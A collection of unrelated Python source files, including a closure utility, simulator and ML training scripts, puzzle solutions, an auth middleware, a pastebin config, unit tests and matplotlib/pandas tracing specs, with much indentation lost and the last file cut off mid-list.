# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
This module contains tools for modifying function objects and anything else
related to the Python function type like artificial function closure creation.
"""
__all__ = ['new_closure_cell', 'new_closure', 'replace']  # this module defines replace(), not replace_closure()
import collections
import functools
import types
try:
  from collections.abc import Mapping  # Python 3.3+
except ImportError:  # Python 2 fallback
  from collections import Mapping
def new_closure_cell(x):
"""
Creates a new Python cell object that can usually be found in a functions
`__closure__` tuple. The values in a `__closure__` must match the free
variables defined in the function's code object's `co_freevars` member.
x (any): The cell contents.
return (cell): A function closure cell object containing *x*.
"""
return (lambda: x).__closure__[0]
def new_closure(cell_values):
"""
  Creates a function closure from the specified list/iterable of values. The
returned object is a tuple of cell objects created with #new_closure_cell().
cell_values (iterable): An iterable of cell values.
return (tuple of cell): A tuple containing only cell objects.
"""
return tuple(map(new_closure_cell, cell_values))
def replace(function, code=None, globals=None, name=None,
argdefs=None, closure=None):
"""
Creates a new function object from the reference *function* where its
members can be replaced using the specified arguments.
# Closure
If *closure* is a dictionary, only the free variables expected by the
function are read from it. If a variable is not defined in the dictionary,
its value will not be changed.
If *closure* is a list/iterable instead it must have exactly as many
elements as free variables required by the function's code object. If
this condition is not satisfied, a #ValueError is raised.
function (types.FunctionType): A function object.
  code (code): The function's new code object.
  globals (dict): The function's new globals dictionary.
  name (str): The function's new name.
  argdefs (tuple): The function's new default arguments.
  closure (tuple, list, dict or None): The function's new closure (see above).
  return (types.FunctionType): The new function object.
  """
if not isinstance(function, types.FunctionType):
raise TypeError('expected FunctionType, got {}'.format(
type(function).__name__))
if code is None:
code = function.__code__
if globals is None:
globals = function.__globals__
if name is None:
name = function.__name__
if argdefs is None:
argdefs = function.__defaults__
if closure is None:
closure = function.__closure__
else:
    if isinstance(closure, Mapping):
closure = [
closure.get(x, function.__closure__[i].cell_contents)
for i, x in enumerate(function.__code__.co_freevars)]
closure = new_closure(closure)
if len(closure) != len(function.__code__.co_freevars):
raise ValueError('function requires {} free closure, only '
'{} values are specified'.format(
len(function.__code__.co_freevars),
len(closure)))
new_func = types.FunctionType(code, globals, name, argdefs, closure)
functools.update_wrapper(new_func, function)
return new_func
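# Illustrative usage sketch (added example, not part of the original module):
# swapping out the value captured by a function's closure via replace().
if __name__ == '__main__':
  def make_adder(n):
    def add(x):
      return x + n
    return add
  add_one = make_adder(1)
  add_ten = replace(add_one, closure={'n': 10})
  assert add_one(5) == 6
  assert add_ten(5) == 15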
|
import habitat_sim
from Config import Config
class Simulator:
def __init__(self):
test_scene = Config().scene
sim_settings = {
"width": 640, # Spatial resolution of the observations
"height": 480,
"scene": test_scene, # Scene path
"default_agent": 0,
"sensor_height": 1.5, # Height of sensors in meters
"color_sensor": True, # RGB sensor
"semantic_sensor": True, # Semantic sensor
"depth_sensor": True, # Depth sensor
"seed": 1,
}
cfg = self.make_cfg(sim_settings)
self.sim = habitat_sim.Simulator(cfg)
self.action_names = list(
cfg.agents[
sim_settings["default_agent"]
].action_space.keys()
)
self.total_frames = 0
def make_cfg(self, settings):
sim_cfg = habitat_sim.SimulatorConfiguration()
sim_cfg.gpu_device_id = 0
sim_cfg.scene.id = settings["scene"]
# Note: all sensors must have the same resolution
sensors = {
"color_sensor": {
"sensor_type": habitat_sim.SensorType.COLOR,
"resolution": [settings["height"], settings["width"]],
"position": [0.0, settings["sensor_height"], 0.0],
},
"depth_sensor": {
"sensor_type": habitat_sim.SensorType.DEPTH,
"resolution": [settings["height"], settings["width"]],
"position": [0.0, settings["sensor_height"], 0.0],
},
"semantic_sensor": {
"sensor_type": habitat_sim.SensorType.SEMANTIC,
"resolution": [settings["height"], settings["width"]],
"position": [0.0, settings["sensor_height"], 0.0],
},
}
sensor_specs = []
for sensor_uuid, sensor_params in sensors.items():
if settings[sensor_uuid]:
sensor_spec = habitat_sim.SensorSpec()
sensor_spec.uuid = sensor_uuid
sensor_spec.sensor_type = sensor_params["sensor_type"]
sensor_spec.resolution = sensor_params["resolution"]
sensor_spec.position = sensor_params["position"]
sensor_specs.append(sensor_spec)
# Here you can specify the amount of displacement in a forward action and the turn angle
agent_cfg = habitat_sim.agent.AgentConfiguration()
agent_cfg.sensor_specifications = sensor_specs
agent_cfg.action_space = {
"move_forward": habitat_sim.agent.ActionSpec(
"move_forward", habitat_sim.agent.ActuationSpec(amount=0.5)
),
"move_backward": habitat_sim.agent.ActionSpec(
"move_backward", habitat_sim.agent.ActuationSpec(amount=0.5)
),
"turn_left": habitat_sim.agent.ActionSpec(
"turn_left", habitat_sim.agent.ActuationSpec(amount=10.0)
),
"turn_right": habitat_sim.agent.ActionSpec(
"turn_right", habitat_sim.agent.ActuationSpec(amount=10.0)
),
}
return habitat_sim.Configuration(sim_cfg, [agent_cfg])
def get_obs(self, action):
observations = self.sim.step(action)
rgb = observations["color_sensor"]
# semantic = observations["semantic_sensor"]
depth = observations["depth_sensor"]
self.total_frames += 1
return rgb, depth
def reset(self):
agent = self.sim.get_agent(0)
agent_state = agent.initial_state # agent.get_state()
num_start_tries = 0
while num_start_tries < 50:
agent_state.position = self.sim.pathfinder.get_random_navigable_point()
num_start_tries += 1
agent.set_state(agent_state)
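# Illustrative usage sketch (added example): this assumes habitat_sim is
# installed and that Config().scene points at a valid scene asset, so it will
# only run in a fully configured environment.
if __name__ == '__main__':
    sim = Simulator()
    sim.reset()
    print('available actions:', sim.action_names)
    rgb, depth = sim.get_obs('move_forward')
    print('rgb shape:', rgb.shape, 'depth shape:', depth.shape)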
|
#! /usr/bin/env python3
from memo import memoize
import sys
description = '''
Path sum: four ways
Problem 83
NOTE: This problem is a significantly more challenging version of Problem 81.
In the 5 by 5 matrix below, the minimal path sum from the top left to the bottom right, by moving left, right, up, and down, is indicated in bold red and is equal to 2297.
131 673 234 103 18
201 96 342 965 150
630 803 746 422 111
537 699 497 121 956
805 732 524 37 331
Find the minimal path sum, in matrix.txt (right click and 'Save Link/Target As...'), a 31K text file containing a 80 by 80 matrix, from the top left to the bottom right by moving left, right, up, and down.
'''
sys.setrecursionlimit(10000)
with open('matrix-83.txt', 'r') as f:
matrix = [[int(x) for x in line.strip().split(',')] for line in f]
def minPathFromStart(matrix):
N = len(matrix)
minPathTo = [[sum(matrix[0][:j+1]) + sum(matrix[k][j] for k in range(0,i+1)) for j in range(0, N)] for i in range(0, N)]
def search(i, j, soFar):
if soFar + matrix[i][j] <= minPathTo[i][j]:
minPathTo[i][j] = soFar + matrix[i][j]
if i > 0:
search(i-1, j, minPathTo[i][j])
if i < N - 1:
search(i+1, j, minPathTo[i][j])
if j < N - 1:
search(i, j+1, minPathTo[i][j])
if j > 0:
search(i, j-1, minPathTo[i][j])
search(0, 0, 0)
return minPathTo[-1][-1]
test = [
[131, 673, 234, 103, 18],
[201, 96, 342, 965, 150],
[630, 803, 746, 422, 111],
[537, 699, 497, 121, 956],
[805, 732, 524, 37, 331]]
print(minPathFromStart(test))
print(minPathFromStart(matrix))
|
import os
from collections import defaultdict
def part1(lines):
coords = set()
max_r = max_c = 0
for line in lines:
r, c = map(int, line.split(", "))
coords.add((r, c))
max_r = max(max_r, r)
max_c = max(max_c, c)
coord_id_to_point = {coord_id: point for coord_id, point in enumerate(coords, start=1)}
region_sizes = defaultdict(int)
infinite_ids = set()
for i in range(max_r + 1):
for j in range(max_c + 1):
min_dists = sorted([(abs(r - i) + abs(c - j), coord_id) for coord_id, (r, c) in coord_id_to_point.items()])
if len(min_dists) == 1 or min_dists[0][0] != min_dists[1][0]:
coord_id = min_dists[0][1]
region_sizes[coord_id] += 1
if i == 0 or i == max_r or j == 0 or j == max_c:
infinite_ids.add(coord_id)
return max(size for coord_id, size in region_sizes.items() if coord_id not in infinite_ids)
def part2(lines, manhattan_limit=10000):
coords = set()
max_r = max_c = 0
for line in lines:
r, c = map(int, line.split(", "))
coords.add((r, c))
max_r = max(max_r, r)
max_c = max(max_c, c)
size_shared_region = 0
for i in range(max_r + 1):
for j in range(max_c + 1):
size_shared_region += int(sum(abs(r - i) + abs(c - j) for r, c in coords) < manhattan_limit)
return size_shared_region
with open("./input", "r") as f:
    lines = [line.strip() for line in f]
print(part1(lines))
print(part2(lines))
|
# pylint: disable=C0103
from CounterFit.sensors import *
from CounterFit.serial_sensors import *
from CounterFit.binary_sensors import *
from CounterFit.i2c_sensors import *
from CounterFit.actuators import *
__version__ = "0.1.3.dev29"
|
import datetime
import re
import time
import aiohttp
import aiohttp.web  # the web submodule is not exposed by "import aiohttp" alone
from utils.config import config
from utils.metrics import checked_tokens, tokenzer_reply
regex = re.compile(r"Bearer\s(\S+)")
async def verifyAuth(app, handler):
async def middleware_handler(request):
try:
if request.path == "/":
checked_tokens.inc()
                header = regex.findall(request.headers.get("Authorization", ""))
if len(header) != 0:
start = time.perf_counter()
async with aiohttp.ClientSession(conn_timeout=2,read_timeout=2) as session:
async with session.post("http://{0}:{1}/verify".format(config["tokenzer"]["address"],config["tokenzer"]["port"]),json={"token": header[0]}) as response:
tokenzer_reply.set(time.perf_counter()- start)
if response.status == 200:
request["profile"] = await response.json()
return await handler(request)
else:
return aiohttp.web.json_response(await response.json(), status=403)
else:
return aiohttp.web.json_response({"message": "Неверный заголовок"}, status=403)
else:
return await handler(request)
except aiohttp.ClientError as error:
print({"type": "Fatal", "module": "Auth", "section": "verifyAuth", "message": error.__str__(), "date": datetime.datetime.now().isoformat("T")})
return aiohttp.web.json_response({"message": "Невозможно проверить сессию"}, status=500)
return middleware_handler
|
# -*- coding: utf-8 -*-
import matplotlib.pyplot as plt
from matplotlib import ticker
import seaborn as sns
from keras.preprocessing.image import ImageDataGenerator
from keras.models import Sequential
from keras.layers import Convolution2D, MaxPooling2D
from keras.layers import Activation, Dropout, Flatten, Dense
from keras.callbacks import ModelCheckpoint, Callback, EarlyStopping
# dimensions of our images.
img_width, img_height = 50, 50
train_data_dir = 'data/symlinks/train'
validation_data_dir = 'data/symlinks/validation'
test_data_dir = 'data/symlinks/test'
nb_epoch = 20
batch_size=128
# this is the augmentation configuration we will use for training
train_datagen = ImageDataGenerator(
samplewise_center=True,
rescale=1./255,
shear_range=0.2,
zoom_range=0.2,
horizontal_flip=True)
# this is the augmentation configuration we will use for testing:
# only rescaling
test_datagen = ImageDataGenerator(
samplewise_center=True,
rescale=1./255)
train_generator = train_datagen.flow_from_directory(
train_data_dir,
target_size=(img_width, img_height),
batch_size=batch_size,
class_mode='binary',
follow_links=True)
validation_generator = test_datagen.flow_from_directory(
validation_data_dir,
target_size=(img_width, img_height),
batch_size=batch_size,
class_mode='binary',
follow_links=True)
test_generator = test_datagen.flow_from_directory(
test_data_dir,
target_size=(img_width, img_height),
batch_size=batch_size,
shuffle=False,
class_mode='binary',
follow_links=True)
def get_model():
model = Sequential()
model.add(Convolution2D(32, (3, 3), input_shape=(img_width, img_height, 3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Convolution2D(32, (3, 3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Convolution2D(64, (3, 3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Flatten())
model.add(Dense(64))
model.add(Activation('relu'))
model.add(Dropout(0.5))
model.add(Dense(1))
model.add(Activation('sigmoid'))
return model
model = get_model()
## Callback for loss logging per epoch
class LossHistory(Callback):
def on_train_begin(self, logs={}):
self.losses = []
self.val_losses = []
def on_epoch_end(self, batch, logs={}):
self.losses.append(logs.get('loss'))
self.val_losses.append(logs.get('val_loss'))
history = LossHistory()
# Note: compile() does not accept verbose/shuffle; those options belong to fit.
model.compile(loss='binary_crossentropy',
              optimizer='rmsprop',
              metrics=['accuracy'])
model.fit_generator(
train_generator,
steps_per_epoch=train_generator.samples/batch_size,
epochs=nb_epoch,
validation_data=validation_generator,
verbose=1,
validation_steps=validation_generator.samples/batch_size,
callbacks=[history])
test_loss, test_acc = model.evaluate_generator(
test_generator,
steps=test_generator.samples/batch_size)
print("test_loss: %.4f - test_acc: %.4f"%(test_loss, test_acc))
loss = history.losses
val_loss = history.val_losses
plt.xlabel('Epochs')
plt.ylabel('Loss')
plt.title('Loss Trend')
plt.plot(loss, 'blue', label='Training Loss')
plt.plot(val_loss, 'green', label='Validation Loss')
plt.xticks(range(0,nb_epoch)[0::2])
plt.legend()
plt.show()
|
# Data directory
data_directory = "./data"
# Listen address
listen_address = "0.0.0.0"
# Listen port
listen_port = 5000
# Use whitelisting
# Whitelisted IPs can view recent pastes on the home page, as well as delete pastes
# For limiting pasting to whitelisted users, enable the "restrict_pasting" option below
use_whitelist = True
# Whitelist CIDR
whitelist_cidr = ['127.0.0.1/32', '10.0.0.0/8', '172.16.0.0/12', '192.168.0.0/16']
# Blacklist CIDR
blacklist_cidr = []
# Restrict pasting functionality to whitelisted IPs
restrict_pasting = False
# Rate limit for pasting (ignored for whitelisted users)
rate_limit = "5/hour"
# Guess threshold for automatic language detection
guess_threshold = 0.20
# Number of recent pastes to show on the home page
recent_pastes = 10
# Try to use X-Real-IP or X-Forwarded-For HTTP headers
behind_proxy = False
# Default theme to display to users
default_theme = "Light"
# Purge interval (in seconds) for checking expired pastes
purge_interval = 3600
# Show recent pastes, even to non-whitelisted users (without a delete button)
force_show_recent = False
# Ignore these classifications for language detection
ignore_guess = ['TeX', 'SQL']
# Show CLI button on home page
show_cli_button = True
# Include https in the generated links instead of http
# This assumes you are behind something else doing the SSL
# termination, but want the users to see https links
#
# This is normally handled by the HTTP headers now
force_https_links = False
# This can be used to specify a different domain for generated links
#
# Note: exclude the http:// or https:// prefix, as well as anything
# following the domain (except the port, if applicable)
override_domain = ""
|
from __future__ import unicode_literals
import time
from wand.image import Image as ImageHandler
class ImageMetadata(object):
@classmethod
def image_metadata(cls, contents):
handler = ImageHandler(blob=contents)
metadata = handler.metadata
        # any() is used because a Python 3 filter() object is always truthy,
        # so it cannot be used directly for this emptiness check.
        any_exif = any(key.startswith('exif:') for key in metadata.keys())
        if not any_exif:
            return {}
aperture = metadata.get('exif:FNumber')
if aperture is not None:
parts = aperture.split('/')
            if len(parts) == 1:  # no '/' in the raw EXIF value
aperture = '1/{0}'.format(parts[0])
else:
aperture = '1/{0}'.format(float(parts[0]) / float(parts[1]))
shutter_speed = metadata.get('exif:ExposureTime')
photographed_at = metadata.get('exif:DateTime')
if photographed_at is not None:
photographed_at = time.strftime(
'%Y-%m-%d %H:%M:%S', time.strptime(
photographed_at, '%Y:%m:%d %H:%M:%S'))
make = metadata.get('exif:Make')
model = metadata.get('exif:Model')
if make is not None and model is not None:
camera = '%s %s' % (make, model)
else:
camera = model
focal_length = metadata.get('exif:FocalLength')
if focal_length is not None:
parts = focal_length.split('/')
if len(parts) == 1:
focal_length = parts[0]
else:
focal_length = float(parts[0]) / float(parts[1])
iso = metadata.get('exif:ISOSpeedRatings')
if iso is not None:
iso = int(iso)
return {
'camera': camera,
'photographed_at': photographed_at,
'focal_length': focal_length,
'aperture': aperture,
'shutter_speed': shutter_speed,
'iso': iso,
}
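# Illustrative usage sketch (added example): extract EXIF metadata from a local
# file. Requires the `wand` bindings for ImageMagick; 'example.jpg' is a
# placeholder path.
if __name__ == '__main__':
    with open('example.jpg', 'rb') as fh:
        print(ImageMetadata.image_metadata(fh.read()))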
|
import unittest
from TestCase.test_HomePage import HomePage
from TestCase.test_AddToCartAndPayment import AddToCartAndPayment
tc1 = unittest.TestLoader().loadTestsFromTestCase(HomePage)
tc2 = unittest.TestLoader().loadTestsFromTestCase(AddToCartAndPayment)
sanityTestSuites = unittest.TestSuite([tc1])
funTestSuites = unittest.TestSuite([tc2])
masterTestSuites = unittest.TestSuite([tc1, tc2])
# unittest.TextTestRunner().run(sanityTestSuites)
# unittest.TextTestRunner().run(funTestSuites)
unittest.TextTestRunner(verbosity=2).run(masterTestSuites)
|
from django.apps import AppConfig
class SakilaConfig(AppConfig):
name = 'sakila'
|
# Read the article (in Thai): https://python3.wannaphong.com/2016/08/%E0%B9%83%E0%B8%8A%E0%B9%89-gnu-octave-%E0%B8%81%E0%B8%B1%E0%B8%9A-python.html
# Using GNU Octave with Python
import numpy as np
from oct2py import Oct2Py
oc = Oct2Py()
oc.plot([1,2,3],'-o', linewidth=2)
xx = np.arange(-2*np.pi, 2*np.pi, 0.2)
oc.surf(np.subtract.outer(np.sin(xx), np.cos(xx)))
|
from unittest import TestCase
from datetime import date
from pyperiods.period import InvalidPeriodError
from pyperiods.years import YearPeriod
class YearPeriodTest(TestCase):
def test_empty_constructor_uses_current_year(self):
current_year = date.today().year
period = YearPeriod()
self.assertEqual(period.year, current_year)
def test_constructor(self):
self.assertEqual(YearPeriod('2016').year, 2016)
self.assertEqual(YearPeriod(2016).year, 2016)
def test_sort_natural(self):
periods = [
YearPeriod('2016'),
YearPeriod('2017'),
YearPeriod('2015'),
]
periods.sort()
self.assertEqual([p.year for p in periods], [2015, 2016, 2017, ])
def test_add(self):
self.assertEqual(YearPeriod(2016) + 1, YearPeriod(2017))
def test_subtract(self):
self.assertEqual(YearPeriod(2016) - 1, YearPeriod(2015))
def test_months(self):
months_in_year = [str(m) for m in YearPeriod(2016).months]
self.assertEqual(months_in_year, ['201601','201602','201603','201604','201605','201606',
'201607','201608','201609','201610','201611','201612'])
def test_range(self):
generator = YearPeriod(2015).range(0, 3)
self.assertEqual([str(year) for year in generator], ['2015', '2016', '2017', '2018'])
def test_range_with_period(self):
generator = YearPeriod(2015).range(stop=YearPeriod(2018))
self.assertEqual([str(year) for year in generator], ['2015', '2016', '2017', '2018'])
def test_range_negative(self):
generator = YearPeriod(2015).range(-2, 2)
self.assertEqual([str(year) for year in generator], ['2013', '2014','2015', '2016', '2017'])
def test_create_from_empty_strings(self):
        self.assertEqual(str(YearPeriod('')), str(YearPeriod()))
def test_current_past_future(self):
month = YearPeriod()
self.assertTrue(month.is_current())
self.assertFalse(month.next().is_current())
self.assertTrue(month.next().is_future())
self.assertFalse(month.next().is_past())
self.assertTrue(month.previous().is_past())
self.assertFalse(month.next().is_past())
def test_invalid_years(self):
self.assertRaises(InvalidPeriodError, YearPeriod, 10000)
self.assertRaises(InvalidPeriodError, YearPeriod, 1950)
self.assertRaises(InvalidPeriodError, YearPeriod, 'ab')
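if __name__ == '__main__':
    # Added convenience entry point so the year-period tests above can be run
    # directly as a script.
    import unittest
    unittest.main()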
|
from pyansys_cartpole.envs.cartpole_mapdl import CartPoleMapdl
from pyansys_cartpole.envs.cartpole_mapdl_simple import CartPoleMapdlSimple
from pyansys_cartpole.envs.cartpole_env import CartPoleEnv
|
from contextlib import closing
import urllib2
import base64
import os
import sys
here = os.path.dirname(os.path.realpath(__file__))
sys.path.append(os.path.join(here, "../vendored"))
from googleapiclient import discovery
from oauth2client.client import GoogleCredentials
API_URL = 'https://{api}.googleapis.com/$discovery/rest?version={apiVersion}'
DETECT_TYPES = ("LABEL_DETECTION", "TEXT_DETECTION", "SAFE_SEARCH_DETECTION",
"FACE_DETECTION", "LANDMARK_DETECTION", "LOGO_DETECTION",
"IMAGE_PROPERTIES")
credentials_path = os.path.join(here, "../google-application-credentials.json")
os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = credentials_path
def get_vision_service():
credentials = GoogleCredentials.get_application_default()
return discovery.build('vision', 'v1',
credentials=credentials,
discoveryServiceUrl=API_URL)
def detect_image(image_url, detect_type="FACE_DETECTION", max_results=4):
"""Uses Google Cloud Vision API to detect an entity within an image in the
given URL.
Args:
image_url: a URL containing an image
detect_type: detection type to perform (default: facial detection)
max_results: the maximum number of entities to detect within the image
Returns:
An array of dicts with information about the entities detected within
the image.
"""
if detect_type not in DETECT_TYPES:
raise TypeError('Invalid detection type given')
if type(max_results) is not int or max_results <= 0:
raise TypeError('Maximum results must be a positive integer')
# Context manager for urllib2.urlopen requires `contextlib` library
# Source: http://stackoverflow.com/a/14849166/234233
with closing(urllib2.urlopen(image_url)) as img:
if img.headers.maintype != 'image':
raise TypeError('Invalid filetype given')
batch_request = [{
'image': {
'content': base64.b64encode(img.read()).decode('UTF-8')
},
'features': [{
'type': detect_type,
'maxResults': max_results
}]
}]
service = get_vision_service()
request = service.images().annotate(
body={
'requests': batch_request
}
)
response = request.execute()
return response
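# Illustrative usage sketch (added example): label detection on a remote image.
# This assumes valid Google application credentials at the path configured
# above; the image URL is a placeholder and must point at an actual image.
if __name__ == '__main__':
    result = detect_image('http://example.com/photo.jpg',
                          detect_type='LABEL_DETECTION',
                          max_results=3)
    print(result)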
|
# https://binarysearch.com/problems/Binary-Search-Tree-Validation
class Solution:
@staticmethod
def getAll(root,lst):
if root == None:
return
lst.append(root.val)
Solution.getAll(root.left,lst)
Solution.getAll(root.right,lst)
def solve(self, root) -> bool:
if root == None:
return True
if root.left != None:
if root.left.val >= root.val:
return False
if root.left.left != None or root.left.right != None:
if not self.solve(root.left):
return False
lst = []
Solution.getAll(root.left,lst)
if not all(x<root.val for x in lst):
return False
if root.right != None:
if root.right.val <= root.val:
return False
if root.right.left != None or root.right.right != None:
                if not self.solve(root.right):
return False
lst = []
Solution.getAll(root.right,lst)
if not all(x>root.val for x in lst):
return False
return True
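# Quick self-check (added example): a minimal stand-in for the judge's tree
# node type, which only needs `val`, `left` and `right` attributes.
if __name__ == '__main__':
    class Tree:
        def __init__(self, val, left=None, right=None):
            self.val, self.left, self.right = val, left, right
    assert Solution().solve(Tree(2, Tree(1), Tree(3))) is True
    assert Solution().solve(Tree(2, Tree(3), Tree(1))) is False
    print('ok')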
|
import collections
import inspect
from typing import List, Union, Callable, Tuple, Any, Optional, Mapping
from databutler.pat.analysis.clock import LogicalClock
from databutler.pat.analysis.hierarchical_trace.builder_utils import TraceEventsCollector, TraceItemsCollector
from databutler.pat.analysis.hierarchical_trace.core import ObjWriteEvent, ObjReadEvent
from databutler.pat.utils import pythonutils
from databutler.utils.logging import logger
SPECS = collections.defaultdict(list)
_CLOCK: Optional[LogicalClock] = None
_TRACE_EVENTS_COLLECTOR: Optional[TraceEventsCollector] = None
_TRACE_ITEMS_COLLECTOR: Optional[TraceItemsCollector] = None
def read_write_spec(funcs: Union[Callable, List[Callable]]):
"""
    The spec is associated with all the functions in `funcs`.
    A spec must take as input a binding of arguments for a call to the function
    (an `inspect.BoundArguments`) together with the call's return value, and
    return a list of (object, access) tuples, where access is either 'read' or
    'write', identifying the objects that the call read from or modified.
    :param funcs: A callable, or a list of callables, to associate the spec with.
    :return: A decorator that registers the spec and returns it unchanged.
"""
if not isinstance(funcs, list):
funcs = [funcs]
def wrapper(spec):
for f in funcs:
SPECS[f].append(spec)
return spec
return wrapper
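# Illustrative sketch (added example, not one of the original specs): a custom
# spec is registered through the decorator above, e.g. for set.add, which
# always mutates its receiver:
#
#   @read_write_spec(set.add)
#   def _set_add_spec(binding: inspect.BoundArguments, ret_val: Any) -> List[Tuple[Any, str]]:
#       return [(binding.arguments['self'], 'write')]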
# ------------------
# SPECS START HERE
# ------------------
@read_write_spec([
list.extend,
list.append,
list.insert,
list.reverse,
list.remove,
list.sort,
list.clear,
list.pop,
dict.pop,
dict.update,
dict.clear,
dict.popitem,
])
def spec(binding: inspect.BoundArguments, ret_val: Any) -> List[Tuple[Any, str]]:
# The list (i.e. `self`) is always modified for these.
return [(binding.arguments['self'], 'write')]
# --------------
# PANDAS
# --------------
try:
import pandas as pd
except ModuleNotFoundError:
pass
else:
try:
pythonutils.load_module_complete(pd)
# Including checks to partly take care of version issues.
@read_write_spec([
*[getattr(pd.DataFrame, name) for name in ["pop", "update"] if hasattr(pd.DataFrame, name)],
*[getattr(pd.Series, name) for name in ["pop", "update"] if hasattr(pd.Series, name)],
])
def spec(binding: inspect.BoundArguments, ret_val: Any) -> List[Tuple[Any, str]]:
return [(binding.arguments['self'], 'write')]
methods_with_inplace = []
for elem in [pd.DataFrame, pd.Series]:
for klass in elem.mro():
for k in dir(klass):
m = getattr(klass, k)
try:
sig = inspect.signature(m)
if 'inplace' in sig.parameters:
methods_with_inplace.append(m)
except:
pass
@read_write_spec(methods_with_inplace)
def spec(binding: inspect.BoundArguments, ret_val: Any) -> List[Tuple[Any, str]]:
if binding.arguments['inplace'] is True:
return [(binding.arguments['self'], 'write')]
else:
return []
methods_with_copy = []
for elem in [pd.DataFrame, pd.Series]:
for klass in elem.mro():
for k in dir(klass):
if k.startswith("_"):
continue
m = getattr(klass, k)
try:
sig = inspect.signature(m)
if 'copy' in sig.parameters:
methods_with_copy.append(m)
except:
pass
@read_write_spec(methods_with_copy)
def spec(binding: inspect.BoundArguments, ret_val: Any) -> List[Tuple[Any, str]]:
if binding.arguments['copy'] is False:
return [(binding.arguments['self'], 'write')]
else:
return []
pd_plotting_functions = [
pd.DataFrame.plot,
pd.Series.plot,
*(v for k, v in vars(pd.DataFrame.plot).items() if not k.startswith("_")),
*(v for k, v in vars(pd.Series.plot).items() if not k.startswith("_")),
*(getattr(pd.DataFrame, k) for k in ['boxplot', 'hist'] if hasattr(pd.DataFrame, k)),
*(getattr(pd.Series, k) for k in ['boxplot', 'hist'] if hasattr(pd.Series, k)),
]
try:
module = pd.plotting._core
for k in ['boxplot', 'boxplot_frame', 'boxplot_frame_groupby', 'hist_frame', 'hist_series']:
if hasattr(module, k):
pd_plotting_functions.append(getattr(module, k))
pd_plotting_functions.append(module.PlotAccessor.__call__)
except:
pass
try:
@read_write_spec(pd_plotting_functions)
def spec(binding: inspect.BoundArguments, ret_val: Any) -> List[Tuple[Any, str]]:
# Mark the current figure object as read and written, in that order.
gcf = plt.gcf()
return [(gcf, 'read'), (gcf, 'write')]
except Exception as e:
logger.info("Failed to load specs for pandas plotting backend.")
logger.exception(e)
except Exception as e:
logger.info("Failed to load specs for pandas.")
logger.exception(e)
# --------------
# SKLEARN
# --------------
try:
import sklearn
except ModuleNotFoundError:
pass
else:
try:
pythonutils.load_module_complete(sklearn)
estimators = set(pythonutils.get_all_subclasses(sklearn.base.BaseEstimator))
classifiers = set(pythonutils.get_all_subclasses(sklearn.base.ClassifierMixin))
regressors = set(pythonutils.get_all_subclasses(sklearn.base.RegressorMixin))
transformers = set(pythonutils.get_all_subclasses(sklearn.base.TransformerMixin))
try:
classifiers.add(sklearn.pipeline.Pipeline)
regressors.add(sklearn.pipeline.Pipeline)
except:
pass
fit_and_fit_transform_methods = [
*(getattr(estimator, "fit") for estimator in estimators
if hasattr(estimator, "fit")),
*(getattr(estimator, "fit_transform") for estimator in estimators
if hasattr(estimator, "fit_transform")),
]
@read_write_spec(fit_and_fit_transform_methods)
def spec(binding: inspect.BoundArguments, ret_val: Any) -> List[Tuple[Any, str]]:
return [(binding.arguments['self'], 'write')]
except Exception as e:
logger.info("Failed to load specs for sklearn.")
logger.exception(e)
# --------------
# Matplotlib
# --------------
try:
import matplotlib
import matplotlib.pyplot as plt
except ModuleNotFoundError:
pass
else:
try:
pythonutils.load_module_complete(matplotlib)
class RcParamsWrapper(matplotlib.RcParams):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._obj_proxy_dict = collections.defaultdict(object)
self._last_event_time = None
self._keys_set_at_last_time = set()
self._keys_get_at_last_time = set()
def __setitem__(self, key, value):
if _CLOCK is not None and _TRACE_ITEMS_COLLECTOR is not None:
cur_item = _TRACE_ITEMS_COLLECTOR.get_last_in_progress_item()
if cur_item is not None:
time = _CLOCK.get_time()
if self._last_event_time != time:
self._last_event_time = time
self._keys_get_at_last_time.clear()
self._keys_set_at_last_time.clear()
if key not in self._keys_set_at_last_time:
obj_id = id(self._obj_proxy_dict[key])
event = ObjWriteEvent(
timestamp=_CLOCK.get_time(),
owner=cur_item,
ast_node=cur_item.ast_node,
obj_id=obj_id,
)
_TRACE_EVENTS_COLLECTOR.add_event(event)
self._keys_set_at_last_time.add(key)
return super().__setitem__(key, value)
def __getitem__(self, key):
if _TRACE_ITEMS_COLLECTOR is not None:
cur_item = _TRACE_ITEMS_COLLECTOR.get_last_in_progress_item()
if cur_item is not None:
time = _CLOCK.get_time()
if self._last_event_time != time:
self._last_event_time = time
self._keys_get_at_last_time.clear()
self._keys_set_at_last_time.clear()
if key not in self._keys_get_at_last_time:
obj_id = id(self._obj_proxy_dict[key])
event = ObjReadEvent(
timestamp=_CLOCK.get_time(),
owner=cur_item,
ast_node=cur_item.ast_node,
obj_id=obj_id,
)
_TRACE_EVENTS_COLLECTOR.add_event(event)
self._keys_get_at_last_time.add(key)
return super().__getitem__(key)
rc_params_wrapped = RcParamsWrapper(plt.rcParams)
matplotlib.rcParams = rc_params_wrapped
plt.rcParams = rc_params_wrapped
plt_functions = [
getattr(plt, k, None) for k in dir(plt)
if inspect.isroutine(getattr(plt, k, None)) and k != 'show' and k != 'figure'
]
@read_write_spec(plt_functions)
def spec(binding: inspect.BoundArguments, ret_val: Any) -> List[Tuple[Any, str]]:
# Mark the current figure object as read and written, in that order.
gcf = plt.gcf()
return [(gcf, 'read'), (gcf, 'write')]
@read_write_spec([plt.figure])
def spec(binding: inspect.BoundArguments, ret_val: Any) -> List[Tuple[Any, str]]:
return [(ret_val, 'read'), (ret_val, 'write')]
figure_methods = []
for k in dir(plt.Figure):
if k.startswith("_") or k.startswith("get_"):
continue
m = getattr(plt.Figure, k)
try:
sig = inspect.signature(m)
figure_methods.append(m)
except:
pass
@read_write_spec(figure_methods)
def spec(binding: inspect.BoundArguments, ret_val: Any) -> List[Tuple[Any, str]]:
fig = binding.arguments['self']
return [(fig, 'read'), (fig, 'write')]
subclasses = pythonutils.get_all_subclasses(matplotlib.artist.Artist)
klass_access_subplot = next(k for k in subclasses if k.__name__.endswith("AxesSubplot"))
subplot_functions = [
v
